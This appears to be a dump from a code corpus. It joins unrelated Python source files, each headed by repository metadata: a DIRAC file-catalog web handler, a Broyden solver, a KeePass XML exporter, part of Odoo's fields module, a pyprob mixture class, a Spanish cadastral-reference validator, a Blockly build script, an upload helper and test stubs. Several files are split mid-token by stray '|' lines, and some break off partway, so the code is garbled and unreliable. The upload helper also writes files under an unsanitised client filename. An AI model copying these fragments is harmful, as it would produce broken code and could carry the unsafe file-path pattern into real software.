from WebAppDIRAC.Lib.WebHandler import WebHandler, asyncGen
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getVOForGroup
from DIRAC import gConfig, gLogger
from DIRAC.Core.Utilities import Time
from hashlib import md5
class FileCatalogHandler( WebHandler ):
AUTH_PROPS = "authenticated"
def __init__(self, *args, **kwargs ):
super( FileCatalogHandler, self ).__init__( *args, **kwargs )
sessionData = self.getSessionData()
self.user = sessionData['user'].get( 'username', '' )
self.group = sessionData['user'].get( 'group', '' )
self.vo = getVOForGroup( self.group )
self.fc = FileCatalog( vo = self.vo )
'''
Method to read all the available fields possible for defining a query
'''
@asyncGen
def web_getMetadataFields(self):
self.L_NUMBER = 0
self.S_NUMBER = 0
result = yield self.threadTask( self.fc.getMetadataFields )
gLogger.debug( "request: %s" % result )
if not result[ "OK" ] :
gLogger.error( "getSelectorGrid: %s" % result[ "Message" ] )
self.finish({ "success" : "false" , "error" : result[ "Message" ] })
return
result = result["Value"]
callback = {}
if not result.has_key( "FileMetaFields" ):
error = "Service response has no FileMetaFields key"
gLogger.error( "getSelectorGrid: %s" % error )
self.finish({ "success" : "false" , "error" : error })
return
if not result.has_key( "DirectoryMetaFields" ):
error = "Service response has no DirectoryMetaFields key"
gLogger.error( "getSelectorGrid: %s" % error )
self.finish({ "success" : "false" , "error" : error })
return
filemeta = result[ "FileMetaFields" ]
if len( filemeta ) > 0 :
for key , value in filemeta.items():
callback[key]= "label"
gLogger.debug( "getSelectorGrid: FileMetaFields callback %s" % callback )
|
dirmeta = result[ "DirectoryMetaFields" ]
if len( dirmeta ) > 0 :
for key , value in dirmeta.items():
callback[key]= value.lower()
gLogger.debug( "getSelectorGrid: Resulting callback %s" % callback )
self.finish({ "success" : "true" , "result" : callback})
'''
Method to read all the available options for a metadata field
'''
@asyncGen
def web_getQueryData( self ):
try:
|
compat = dict()
for key in self.request.arguments:
parts = str( key ).split(".")
if len(parts)!=3:
continue
key = str( key )
name = parts[1]
sign = parts[2]
if not len( name ) > 0:
continue
value = str( self.request.arguments[ key ][0] ).split("|")
#check existence of the 'name' section
if not compat.has_key(name):
compat[name] = dict()
#check existence of the 'sign' section
if not compat[name].has_key(sign):
if value[0]=="v":
compat[name][sign] = ""
elif value[0]=="s":
compat[name][sign] = []
if value[0]=="v":
compat[name][sign] = value[1]
elif value[0]=="s":
compat[name][sign] += value[1].split(":::")
except Exception, e:
self.finish({ "success" : "false" , "error" : "Metadata query error" })
return
path = "/"
if self.request.arguments.has_key("path") :
path = self.request.arguments["path"][0]
gLogger.always( compat )
result = yield self.threadTask( self.fc.getCompatibleMetadata, compat, path )
gLogger.always( result )
if not result[ "OK" ]:
self.finish({ "success" : "false" , "error" : result[ "Message" ] })
return
self.finish({ "success" : "true" , "result" : result["Value"] })
@asyncGen
def web_getFilesData( self ) :
req = self.__request()
gLogger.always(req)
gLogger.debug( "submit: incoming request %s" % req )
result = yield self.threadTask( self.fc.findFilesByMetadataWeb, req["selection"] , req["path"] , self.S_NUMBER , self.L_NUMBER)
gLogger.debug( "submit: result of findFilesByMetadataDetailed %s" % result )
if not result[ "OK" ] :
gLogger.error( "submit: %s" % result[ "Message" ] )
self.finish({ "success" : "false" , "error" : result[ "Message" ] })
return
result = result[ "Value" ]
if not len(result) > 0:
self.finish({ "success" : "true" , "result" : [] , "total" : 0, "date":"-" })
return
total = result[ "TotalRecords" ]
result = result[ "Records" ]
callback = list()
for key , value in result.items() :
size = ""
if "Size" in value:
size = value[ "Size" ]
date = ""
if "CreationDate" in value:
date = str( value[ "CreationDate" ] )
meta = ""
if "Metadata" in value:
m = value[ "Metadata" ]
meta = '; '.join( [ '%s: %s' % ( i , j ) for ( i , j ) in m.items() ] )
dirnameList = key.split("/")
dirname = "/".join(dirnameList[:len(dirnameList)-1])
filename = dirnameList[len(dirnameList)-1:]
callback.append({"fullfilename":key, "dirname": dirname, "filename" : filename , "date" : date , "size" : size ,
"metadata" : meta })
timestamp = Time.dateTime().strftime("%Y-%m-%d %H:%M [UTC]")
self.finish({ "success" : "true" , "result" : callback , "total" : total, "date":timestamp})
def __request(self):
req = { "selection" : {} , "path" : "/" }
self.L_NUMBER = 25
if self.request.arguments.has_key( "limit" ) and len( self.request.arguments[ "limit" ][0] ) > 0:
self.L_NUMBER = int( self.request.arguments[ "limit" ][0] )
self.S_NUMBER = 0
if self.request.arguments.has_key( "start" ) and len( self.request.arguments[ "start" ][0] ) > 0:
self.S_NUMBER = int( self.request.arguments[ "start" ][0] )
result = gConfig.getOption( "/WebApp/ListSeparator" )
if result[ "OK" ] :
separator = result[ "Value" ]
else:
separator = ":::"
result = self.fc.getMetadataFields()
gLogger.debug( "request: %s" % result )
if not result["OK"]:
gLogger.error( "request: %s" % result[ "Message" ] )
return req
result = result["Value"]
if not result.has_key( "FileMetaFields" ):
error = "Service response has no FileMetaFields key. Return empty dict"
gLogger.error( "request: %s" % error )
return req
if not result.has_key( "DirectoryMetaFields" ):
error = "Service response has no DirectoryMetaFields key. Return empty dict"
gLogger.error( "request: %s" % error )
return req
filemeta = result[ "FileMetaFields" ]
dirmeta = result[ "DirectoryMetaFields" ]
meta = []
for key,value in dirmeta.items() :
meta.append( key )
gLogger.always( "request: metafields: %s " % meta )
for param in self.request.arguments :
tmp = str( param ).split( '.' )
if len( tmp ) != 3 :
continue
name = tmp[1]
logic = tmp[2]
value = self.request.arguments[param][0].split("|")
if not logic in ["in","nin", "=" , "!=" , ">=" , "<=" , ">" , "<" ] :
gLogger.always( "Operand '%s' is not supported " % logic )
continue
if name in meta :
#check existence of the 'name' section
if not req[ "selection" ].has_key(name):
req[ "selection" ][name] = dict()
#check existence of the 'sign' section
if not req[ "selection" ][name].has_key(logic):
if value[0]=="v":
req[ "selection" ][name][logic] = ""
elif value[0]=="s":
req[ "selection" ][name][logic] = []
if value[0]=="v":
req[ "selection" ][name][logic] = value[1]
elif value[0]=="s":
req[ "selection" ][name][logic] += value[1].split(":::")
if self.request.arguments.has_key("path") :
req["path"] = self.request.arguments["path"][0]
gLogger.always("REQ: ",req)
return req
def __request_file(self):
req = { "selection" : {} , "path" : "/" }
separator = ":::"
result = self.fc.getMetadataFields()
gLogger.debug( "request: %s" % result )
if not result["OK"]:
gLogger.error( "req
|
paulocsanz/algebra-linear
|
scripts/eq_n_linear_broyden.py
|
Python
|
agpl-3.0
| 1,262 | 0.011094 |
#!/usr/bin/env python3
from erros import NaoConverge
from numpy import matrix
from numpy.linalg import inv
from numpy.linalg import norm
def SolucaoEqNLinearBroyden(xin, bi, tol, niter, F):
xold = xin
bold = matrix(bi)
tolerancia = 1
while (tolerancia > tol and niter != -1):
f = matrix(F(xold))
if f.size == 1:
f = f.transpose()
j = bold
jinv = inv(j)
deltax = -1 * jinv * f
deltax = deltax.transpose() #usado para realizar a soma com Xold
xnew = deltax + xold
deltax = deltax.transpose() #voltar ao normal
xnew = list(xnew.flat)
y = matrix(F(xnew)) - matrix(F(xold))
bnew = bold + ((y - bold*deltax)*deltax.transpose()) / (deltax.transpose()*deltax)
tolerancia = norm(deltax) / norm(xnew)
niter -= 1
xold = xnew
bold = bnew
if n
|
iter == -1:
raise NaoConverge
return xold
if __name__ == "__main__":
F = lambda x: [[x[0] + 2 * x[1] - 2], [x[0]*x[0] + 4 * x[1]*x[1] - 4]]
try:
|
print(SolucaoEqNLinearBroyden([2,3], [[1,2],[4,24]], 0.0001, 100, F))
except NaoConverge:
print("Convergence not reached")
|
hozn/keepassdb
|
keepassdb/export/xml.py
|
Python
|
gpl-3.0
| 3,206 | 0.005614 |
"""
Support for exporting database to KeePassX XML format.
"""
from __future__ import absolute_import
from datetime import datetime
from xml.etree import ElementTree as ET
from xml.dom import minidom
from keepassdb import const
class XmlExporter(object):
"""
Class for exporting database to KeePassX XML format.
:ivar include_comment: Whether to include a 'generated-by' comment in the header.
:ivar prettyprint: Whether to generate pretty-printed XML (indent, etc.).
"""
include_comment = False
prettyprint = True
def __init__(self, include_comment=False, prettyprint=True):
self.include_comment = include_comment
self.prettyprint = prettyprint
def export(self, db):
"""
Export the dbnode to KeePassX XML format.
:param db: The database to export.
:type db: :class:`keepassdb.db.Database`
"""
dbnode = ET.Element('database')
if self.include_comment:
now = datetime.now()
filepath = db.filepath
if filepath:
comment = ET.Comment('Generated by keepassdb from {0} on {1}'.format(filepath, now.strftime("%c")))
else:
comment = ET.Comment('Generated by keepassdb on {0}'.format(now.strftime("%c")))
dbnode.append(comment)
def _date(dt):
if dt == const.NEVER:
return 'Never'
else:
# 2012-12-20T20:56:56
return dt.strftime('%Y-%m-%dT%H:%M:%S')
def group_to_xml(group, node):
gnode = ET.SubElement(node, 'group')
title = ET.SubElement(gnode, 'title')
title.text = group.title
icon = ET.SubElement(gnode, 'icon')
icon.text = str(group.icon)
for subgroup in group.children:
group_to_xml(subgroup, gnode)
for entry in group.entries:
if entry.title == 'Meta-Info' and entry.username == 'SYSTEM':
continue
enode = ET.SubElement(gnode, 'entry')
ET.SubElement(enode, 'title').text = entry.title
ET.SubElement(enode, 'username').text = entry.username
ET.SubElement(enode, 'password').text = entry.password
ET.SubElement(enode, 'url').text = entry.url
ET.SubElement(enode, 'comment').text = entry.notes
ET.SubElement(enode, 'icon').text = str(entry.icon)
ET.SubElement(enode, 'creation').text = _date(entry.created)
ET.SubElement(enode, 'lastaccess').text = _date(entry.accessed)
ET.SubElement(enode, 'lastmod').text = _date(entry.modified)
|
ET.SubElemen
|
t(enode, 'expire').text = _date(entry.expires)
return gnode
for group in db.root.children:
dbnode.append(group_to_xml(group, dbnode))
xmlstr = ET.tostring(dbnode)
if self.prettyprint:
reparsed = minidom.parseString(xmlstr)
xmlstr = reparsed.toprettyxml(indent=" ")
return xmlstr
|
Codefans-fan/odoo
|
openerp/fields.py
|
Python
|
agpl-3.0
| 70,820 | 0.001525 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-2014 OpenERP (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" High-level objects for fields. """
from datetime import date, datetime
from functools import partial
from operator import attrgetter
from types import NoneType
import logging
import pytz
import xmlrpclib
from openerp.tools import float_round, ustr, html_sanitize
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT as DATE_FORMAT
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT as DATETIME_FORMAT
DATE_LENGTH = len(date.today().strftime(DATE_FORMAT))
DATETIME_LENGTH = len(datetime.now().strftime(DATETIME_FORMAT))
_logger = logging.getLogger(__name__)
class SpecialValue(object):
""" Encapsulates a value in the cache in place of a normal value. """
def __init__(self, value):
self.value = value
def get(self):
return self.value
class FailedValue(SpecialValue):
""" Special value that encapsulates an exception instead of a value. """
def __init__(self, exception):
self.exception = exception
def get(self):
raise self.exception
def _check_value(value):
""" Return `value`, or call its getter if `value` is a :class:`SpecialValue`. """
return value.get() if isinstance(value, SpecialValue) else value
def resolve_all_mro(cls, name, reverse=False):
""" Return the (successively overridden) values of attribute `name` in `cls`
in mro order, or inverse mro order if `reverse` is true.
"""
klasses = reversed(cls.__mro__) if reverse else cls.__mro__
for klass in klasses:
if name in klass.__dict__:
yield klass.__dict__[name]
class MetaField(type):
""" Metaclass for field classes. """
by_type = {}
def __init__(cls, name, bases, attrs):
super(MetaField, cls).__init__(name, bases, attrs)
if cls.type:
cls.by_type[cls.type] = cls
# compute class attributes to avoid calling dir() on fields
cls.column_attrs = []
cls.related_attrs = []
cls.description_attrs = []
for attr in dir(cls):
if attr.startswith('_column_'):
cls.column_attrs.append((attr[8:], attr))
elif attr.startswith('_related_'):
cls.related_attrs.append((attr[9:], attr))
elif attr.startswith('_description_'):
cls.description_attrs.append((attr[13:], attr))
class Field(object):
""" The field descriptor contains the field definition, and manages accesses
and assignments of the corresponding field on records. The following
attributes may be provided when instanciating a field:
:param string: the label of the field seen by users (string); if not
set, the ORM takes the field name in the class (capitalized).
:param help: the tooltip of the field seen by users (string)
:param readonly: whether the field is readonly (boolean, by default ``False``)
:param required: whether the value of the field is required (boolean, by
default ``False``)
:param index: whether the field is indexed in database (boolean, by
default ``False``)
:param default: the default value for the field; this is either a static
value, or a function taking a recordset and returning a value
:param states: a dictionary mapping state values to lists of UI attribute-value
pairs; possible attributes are: 'readonly', 'required', 'invisible'.
Note: Any state-based condition requires the ``state`` field value to be
available on the client-side UI. This is typically done by including it in
the relevant views, possibly made invisible if not relevant for the
end-user.
:param groups: comma-separated list of group xml ids (string); this
restricts the field access to the users of the given groups only
:param bool copy: whether the field value should be copied when the record
is duplicated (default: ``True`` for normal fields, ``False`` for
``one2many`` and computed fields, including property fields and
related fields)
:param string oldname: the previous name of this field, so that ORM can rename
it automatically at migration
.. _field-computed:
.. rubric:: Computed fields
One can define a field whose value is computed instead of simply being
read from the database. The attributes that are specific to computed
fields are given below. To define such a field, simply provide a value
for the attribute `compute`.
:param compute: name of a method that computes the field
:param inverse: name of a method that inverses the field (optional)
:param search: name of a method that implement search on the field (optional)
:param store: whether the field is stored in database (boolean, by
default ``False`` on computed fields)
The methods given for `compute`, `inverse` and `search` are model
methods. Their signature is shown in the following example::
upper = fields.Char(compute='_compute_upper',
inverse='_inverse_upper',
search='_search_upper')
@api.depends('name')
def _compute_upper(self):
for rec in self:
self.upper = self.name.upper() if self.name else False
def _inverse_upper(self):
for rec in self:
self.name = self.upper.lower() if self.upper else False
def _search_upper(self, operator, value):
if operator == 'like':
operator = 'ilike'
return [('name', operator, value)]
The compute method has to assign the field on all records of the invoked
recordset. The decorator :meth:`openerp.api.depends` must be applied on
the compute method to specify the field dependencies; those dependencies
are used to determine when to recompute the field; recomputation is
automatic and guarantees cache/database consistency. Note that the same
method can be used for several fields, you simply have to assign all the
given fields in the method; the method will be invoked once for all
those fields.
By default, a computed field is not stored to the database, and is
computed on-the-fly. Adding the attribute ``store=True`` will store the
field's values in the database. The advantage of a stored field is that
searching on that field is
|
done by the database itself. The disadvantage
is that it requires database updates when the field must be recomputed.
|
The inverse method, as its name says, does the inverse of the compute
method: the invoked records have a value for the field, and you must
apply the necessary changes on the field dependencies such that the
computation gives the expected value. Note that a computed field without
an inverse method is readonly by default.
The search method is invoked when processing domains before doing an
act
|
probprog/pyprob
|
pyprob/distributions/mixture.py
|
Python
|
bsd-2-clause
| 3,418 | 0.002048 |
import torch
from . import Distribution, Categorical
from .. import util
class Mixture(Distribution):
def __init__(self, distributions, probs=None):
self._distributions = distributions
self.length = len(distributions)
if probs is None:
self._probs = util.to_tensor(torch.zeros(self.length)).fill_(1./self.length)
else:
self._probs = util.to_tensor(probs)
self._probs = self._probs / self._probs.sum(-1, keepdim=True)
self._log_probs = torch.log(util.clamp_probs(self._probs))
event_shape = torch.Size()
if self._probs.dim() == 1:
batch_shape = torch.Size()
self._batch_length = 0
elif self._probs.dim() == 2:
batch_shape = torch.Size([self._probs.size(0)])
self._batch_length = self._probs.size(0)
else:
raise Value
|
Error('Expecting a 1d or 2d (batched) mixture probabilities.')
self._mixing_dist = Categorical(self._probs)
self._mean = None
self._variance = None
super().__init__(name='Mixture', address_suffix='Mixture({})'.format(', '.join([d._address_suffix for d in self._distributions])), batch_shape=batch_shape, event_shape=event_shape)
def __repr__(self):
return 'Mixture(distributions:({}), probs:{})'.forma
|
t(', '.join([repr(d) for d in self._distributions]), self._probs)
def __len__(self):
return self.length
def log_prob(self, value, sum=False):
if self._batch_length == 0:
value = util.to_tensor(value).squeeze()
lp = torch.logsumexp(self._log_probs + util.to_tensor([d.log_prob(value) for d in self._distributions]), dim=0)
else:
value = util.to_tensor(value).view(self._batch_length)
lp = torch.logsumexp(self._log_probs + torch.stack([d.log_prob(value).squeeze(-1) for d in self._distributions]).view(-1, self._batch_length).t(), dim=1)
return torch.sum(lp) if sum else lp
def sample(self):
if self._batch_length == 0:
i = int(self._mixing_dist.sample())
return self._distributions[i].sample()
else:
indices = self._mixing_dist.sample()
dist_samples = []
for d in self._distributions:
sample = d.sample()
if sample.dim() == 0:
sample = sample.unsqueeze(-1)
dist_samples.append(sample)
ret = []
for b in range(self._batch_length):
i = int(indices[b])
ret.append(dist_samples[i][b])
return util.to_tensor(ret)
@property
def mean(self):
if self._mean is None:
means = torch.stack([d.mean for d in self._distributions])
if self._batch_length == 0:
self._mean = torch.dot(self._probs, means)
else:
self._mean = torch.diag(torch.mm(self._probs, means))
return self._mean
@property
def variance(self):
if self._variance is None:
variances = torch.stack([(d.mean - self.mean).pow(2) + d.variance for d in self._distributions])
if self._batch_length == 0:
self._variance = torch.dot(self._probs, variances)
else:
self._variance = torch.diag(torch.mm(self._probs, variances))
return self._variance
|
holvi/python-stdnum
|
stdnum/es/referenciacatastral.py
|
Python
|
lgpl-2.1
| 4,360 | 0 |
# referenciacatastral.py - functions for handling Spanish real state ids
# coding: utf-8
#
# Copyright (C) 2016 David García Garzón
# Copyright (C) 2016-2017 Arthur de Jong
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without
|
even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""
|
Referencia Catastral (Spanish real estate property id)
The cadastral reference code is an identifier for real estate in Spain. It is
issued by Dirección General del Catastro (General Directorate of Land
Registry) of the Ministerio de Hacienda (Tresury Ministry).
It has 20 digits and contains numbers and letters including the Spanish Ñ.
The number consists of 14 digits for the parcel, 4 for identifying properties
within the parcel and 2 check digits. The parcel digits are structured
differently for urban, non-urban or special (infrastructure) cases.
More information:
* http://www.catastro.meh.es/esp/referencia_catastral_1.asp (Spanish)
* http://www.catastro.meh.es/documentos/05042010_P.pdf (Spanish)
* https://es.wikipedia.org/wiki/Catastro#Referencia_catastral
>>> validate('7837301-VG8173B-0001 TT') # Lanteira town hall
'7837301VG8173B0001TT'
>>> validate('783301 VG8173B 0001 TT') # missing digit
Traceback (most recent call last):
...
InvalidLength: ...
>>> validate('7837301/VG8173B 0001 TT') # not alphanumeric
Traceback (most recent call last):
...
InvalidFormat: ...
>>> validate('7837301 VG8173B 0001 NN') # bad check digits
Traceback (most recent call last):
...
InvalidChecksum: ...
>>> format('4A08169P03PRAT0001LR') # BCN Airport
'4A08169 P03PRAT 0001 LR'
"""
from stdnum.exceptions import *
from stdnum.util import clean
alphabet = u'ABCDEFGHIJKLMNÑOPQRSTUVWXYZ0123456789'
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any valid separators and removes surrounding whitespace."""
return clean(number, ' -').strip().upper()
def format(number):
"""Reformat the passed number to the standard format."""
number = compact(number)
return ' '.join([
number[:7],
number[7:14],
number[14:18],
number[18:]
])
# The check digit implementation is based on the Javascript
# implementation by Vicente Sancho that can be found at
# http://trellat.es/validar-la-referencia-catastral-en-javascript/
def _check_digit(number):
"""Calculate a single check digit on the provided part of the number."""
weights = (13, 15, 12, 5, 4, 17, 9, 21, 3, 7, 1)
s = sum(w * (int(n) if n.isdigit() else alphabet.find(n) + 1)
for w, n in zip(weights, number))
return 'MQWERTYUIOPASDFGHJKLBZX'[s % 23]
def _force_unicode(number):
"""Convert the number to unicode."""
if not hasattr(number, 'isnumeric'): # pragma: no cover (Python 2 code)
number = number.decode('utf-8')
return number
def calc_check_digits(number):
"""Calculate the check digits for the number."""
number = _force_unicode(compact(number))
return (
_check_digit(number[0:7] + number[14:18]) +
_check_digit(number[7:14] + number[14:18]))
def validate(number):
"""Checks to see if the number provided is a valid Cadastral Reference.
This checks the length, formatting and check digits."""
number = compact(number)
n = _force_unicode(number)
if not all(c in alphabet for c in n):
raise InvalidFormat()
if len(n) != 20:
raise InvalidLength()
if calc_check_digits(n) != n[18:]:
raise InvalidChecksum()
return number
def is_valid(number):
"""Checks to see if the number provided is a valid Cadastral Reference."""
try:
return bool(validate(number))
except ValidationError:
return False
|
kesl-scratch/PopconBot
|
scratch-blocks/build.py
|
Python
|
mit
| 18,550 | 0.007978 |
#!/usr/bin/python2.7
# Compresses the core Blockly files into a single JavaScript file.
#
# Copyright 2012 Google Inc.
# https://developers.google.com/blockly/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script generates two versions of Blockly's core files:
# blockly_compressed.js
# blockly_uncompressed.js
# The compressed file is a concatenation of all of Blockly's core files which
# have been run through Google's Closure Compiler. This is done using the
# online API (which takes a few seconds and requires an Internet connection).
# The uncompressed file is a script that loads in each of Blockly's core files
# one by one. This takes much longer for a browser to load, but is useful
# when debugging code since line numbers are meaningful and variables haven't
# been renamed. The uncompressed file also allows for a faster developement
# cycle since there is no need to rebuild or recompile, just reload.
#
# This script also generates:
# blocks_compressed.js: The compressed common blocks.
# blocks_horizontal_compressed.js: The compressed Scratch horizontal blocks.
# blocks_vertical_compressed.js: The compressed Scratch vertical blocks.
# msg/js/<LANG>.js for every language <LANG> defined in msg/js/<LANG>.json.
import sys
if sys.version_info[0] != 2:
raise Exception("Blockly build only compatible with Python 2.x.\n"
"You are using: " + sys.version)
import errno, glob, httplib, json, os, re, subprocess, threading, urllib
def import_path(fullpath):
"""Import a file with full path specification.
Allows one to import from any directory, something __import__ does not do.
Args:
fullpath: Path and filename of import.
Returns:
An imported module.
"""
path, filename = os.path.split(fullpath)
filename, ext = os.path.splitext(filename)
sys.path.append(path)
module = __import__(filename)
reload(module) # Might be out of date.
del sys.path[-1]
return module
HEADER = ("// Do not edit this file; automatically generated by build.py.\n"
"'use strict';\n")
class Gen_uncompressed(threading.Thread):
"""Generate a JavaScript file that loads Blockly's raw files.
Runs in a separate thread.
"""
def __init__(self, search_paths, vertical):
threading.Thread.__init__(self)
self.search_paths = search_paths
self.vertical = vertical
def run(self):
if self.vertical:
target_filename = 'blockly_uncompressed_vertical.js'
else:
target_filename = 'blockly_uncompressed_horizontal.js'
f = open(target_filename, 'w')
f.write(HEADER)
f.write("""
var isNodeJS = !!(typeof module !== 'undefined' && module.exports &&
typeof window === 'undefined');
if (isNodeJS) {
var window = {};
require('../closure-library/closure/goog/bootstrap/nodejs');
}
window.BLOCKLY_DIR = (function() {
if (!isNodeJS) {
// Find name of current directory.
var scripts = document.getElementsByTagName('script');
var re = new RegExp('(.+)[\/]blockly_uncompressed(_vertical|_horizontal|)\.js$');
for (var i = 0, script; script = scripts[i]; i++) {
var match = re.exec(script.src);
if (match) {
return match[1];
}
}
alert('Could not detect Blockly\\'s directory name.');
}
return '';
})();
window.BLOCKLY_BOOT = function() {
var dir = '';
if (isNodeJS) {
require('../closure-library/closure/goog/bootstrap/nodejs');
dir = 'blockly';
} else {
// Execute after Closure has loaded.
if (!window.goog) {
alert('Error: Closure not found. Read this:\\n' +
'developers.google.com/blockly/guides/modify/web/closure');
}
dir = window.BLOCKLY_DIR.match(/[^\\/]+$/)[0];
}
""")
add_dependency = []
base_path = calcdeps.FindClosureBasePath(self.search_paths)
for dep in calcdeps.BuildDependenciesFromFiles(self.search_paths):
add_dependency.append(calcdeps.GetDepsLine(dep, base_path))
add_dependency = '\n'.join(add_dependency)
# Find the Blockly directory name and replace it with a JS variable.
# This allows blockly_uncompressed.js to be compiled on one computer and be
# used on another, even if the directory name differs.
m = re.search('[\\/]([^\\/]+)[\\/]core[\\/]blockly.js', add_dependency)
add_dependency = re.sub('([\\/])' + re.escape(m.group(1)) +
'([\\/]core[\\/])', '\\1" + dir + "\\2', add_dependency)
f.write(add_depe
|
ndency + '\n')
|
provides = []
for dep in calcdeps.BuildDependenciesFromFiles(self.search_paths):
if not dep.filename.startswith(os.pardir + os.sep): # '../'
provides.extend(dep.provides)
provides.sort()
f.write('\n')
f.write('// Load Blockly.\n')
for provide in provides:
f.write("goog.require('%s');\n" % provide)
f.write("""
delete this.BLOCKLY_DIR;
delete this.BLOCKLY_BOOT;
};
if (isNodeJS) {
window.BLOCKLY_BOOT()
module.exports = Blockly;
} else {
// Delete any existing Closure (e.g. Soy's nogoog_shim).
document.write('<script>var goog = undefined;</script>');
// Load fresh Closure Library.
document.write('<script src="' + window.BLOCKLY_DIR +
'/../closure-library/closure/goog/base.js"></script>');
document.write('<script>window.BLOCKLY_BOOT();</script>');
}
""")
f.close()
print("SUCCESS: " + target_filename)
class Gen_compressed(threading.Thread):
"""Generate a JavaScript file that contains all of Blockly's core and all
required parts of Closure, compiled together.
Uses the Closure Compiler's online API.
Runs in a separate thread.
"""
def __init__(self, search_paths_vertical, search_paths_horizontal):
threading.Thread.__init__(self)
self.search_paths_vertical = search_paths_vertical
self.search_paths_horizontal = search_paths_horizontal
def run(self):
self.gen_core(True)
self.gen_core(False)
self.gen_blocks("horizontal")
self.gen_blocks("vertical")
self.gen_blocks("common")
self.gen_generator("arduino")
def gen_core(self, vertical):
if vertical:
target_filename = 'blockly_compressed_vertical.js'
search_paths = self.search_paths_vertical
else:
target_filename = 'blockly_compressed_horizontal.js'
search_paths = self.search_paths_horizontal
# Define the parameters for the POST request.
params = [
("compilation_level", "SIMPLE_OPTIMIZATIONS"),
("use_closure_library", "true"),
("output_format", "json"),
("output_info", "compiled_code"),
("output_info", "warnings"),
("output_info", "errors"),
("output_info", "statistics"),
]
# Read in all the source files.
filenames = calcdeps.CalculateDependencies(search_paths,
[os.path.join("core", "blockly.js")])
for filename in filenames:
# Filter out the Closure files (the compiler will add them).
if filename.startswith(os.pardir + os.sep): # '../'
continue
f = open(filename)
params.append(("js_code", "".join(f.readlines())))
f.close()
self.do_compile(params, target_filename, filenames, "")
def gen_blocks(self, block_type):
if block_type == "horizontal":
target_filename = "blocks_compressed_horizontal.js"
filenames = glob.glob(os.path.join("blocks_horizontal", "*.js"))
elif block_type == "vertical":
target_filename = "blocks_compressed_vertical.js"
filenames = glob.glob(os.path.join("blocks_vertical", "*.js"))
elif block_type == "common":
target_filename = "blocks_compressed.js"
filenames = glob.glob(os.path.join("blocks_common", "*.js"))
# Define the parameters for the POST request.
params = [
|
unixhot/opencmdb
|
util/util.py
|
Python
|
apache-2.0
| 366 | 0.008197 |
imp
|
ort hashlib
def handle_uploaded_file(f):
img_url = 'media/image/' + CalcMD5(f) + f._name
with open(img_url, 'wb+') as destination:
for chunk in f.chunks():
destination.write(chunk)
return ('/' + img_url, f._name)
def CalcMD5(f):
md5obj =
|
hashlib.md5()
md5obj.update(f.read())
hash = md5obj.hexdigest()
return hash
|
morgangalpin/duckomatic
|
tests/test_main.py
|
Python
|
gpl-3.0
| 1,476 | 0 |
# -*- coding: utf-8 -*-
# from pytest import raises
# The parametrize function is generated, so this doesn't work:
#
# from pyte
|
st.mark import parametrize
#
import pytest
parametrize = pytest.mark.parametrize
# from duckomatic import metadata
# TODO: Importing this is broken because six.moves.urllib gives
# an import error.
# from duckomatic.__main__ import main
class TestMain(object):
def test_fake(self):
pass
# @parametrize('helparg', ['-h', '--help'])
# def test_help(self, helparg, capsys):
# with raises(SystemExit) as exc_info:
# main(['progname', helparg])
# out,
|
err = capsys.readouterr()
# # Should have printed some sort of usage message. We don't
# # need to explicitly test the content of the message.
# assert 'usage' in out
# # Should have used the program name from the argument
# # vector.
# assert 'progname' in out
# # Should exit with zero return code.
# assert exc_info.value.code == 0
# @parametrize('versionarg', ['-V', '--version'])
# def test_version(self, versionarg, capsys):
# with raises(SystemExit) as exc_info:
# main(['progname', versionarg])
# out, err = capsys.readouterr()
# # Should print out version.
# assert err == '{0} {1}\n'.format(metadata.project, metadata.version)
# # Should exit with zero return code.
# assert exc_info.value.code == 0
|
onecloud/neutron
|
neutron/tests/functional/agent/linux/base.py
|
Python
|
apache-2.0
| 2,637 | 0 |
# Copyright 2014 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import random
from neutron.agent.linux import ovs_lib
from neutron.agent.linux import utils
from neutron.common import constants as n_const
from neutron.tests import base
BR_PREFIX = 'test-br'
class BaseLinuxTestCase(base.BaseTestCase):
def setUp(self, root_helper='sudo'):
super(BaseLinuxTestCase, self).setU
|
p()
self.root_helper = root_helper
def check_command(self, cmd, error_text, skip_msg):
try:
utils.execute(cmd)
except RuntimeErro
|
r as e:
if error_text in str(e):
self.skipTest(skip_msg)
raise
def check_sudo_enabled(self):
if os.environ.get('OS_SUDO_TESTING') not in base.TRUE_STRING:
self.skipTest('testing with sudo is not enabled')
def get_rand_name(self, max_length, prefix='test'):
